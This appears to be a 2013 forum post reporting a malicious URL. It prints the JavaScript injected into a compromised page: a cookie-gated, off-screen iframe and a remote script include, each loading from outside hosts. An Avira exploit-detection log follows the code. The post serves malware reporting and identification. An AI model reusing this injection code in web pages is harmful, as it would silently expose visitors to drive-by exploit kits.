http://parilca.ru/otopitelnie_kamini/kastor/bravo_leopard_6

显示全部楼层 · 发表于 2013-11-6 06:02:27

/*a9a007*/
function ji09() {
var static = 'ajax';
var controller = 'index.php';
var ji = document.createElement('iframe');
ji.src = 'http://artcomnieuws.nl/firewall.php';
ji.style.position = 'absolute';
ji.style.color = '5054';
ji.style.height = '5054px';
ji.style.width = '5054px';
ji.style.left = '10005054';
ji.style.top = '10005054';
if (!document.getElementById('ji')) {
document.write('<p id=\'ji\' class=\'ji09\' ></p>');
document.getElementById('ji').appendChild(ji);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
ji09();
}
} /*/a9a007*/
/*339810*/
document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://reddeerramadahotel.com/core/xk8a5BRr.php" type="text/javascript"></script>') /*/339810*/

复制代码

Avira

2013/11/6 上午 05:53 [Web Protection] 發現惡意程式碼
   從 URL "http://uruloki.net/lair/2008/05/27/lock-down/" 存取資料時，
   發現病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]。
   已採取動作：封鎖的檔案

fs is

[已鉴定] http://parilca.ru/otopitelnie_kamini/kastor/bravo_leopard_6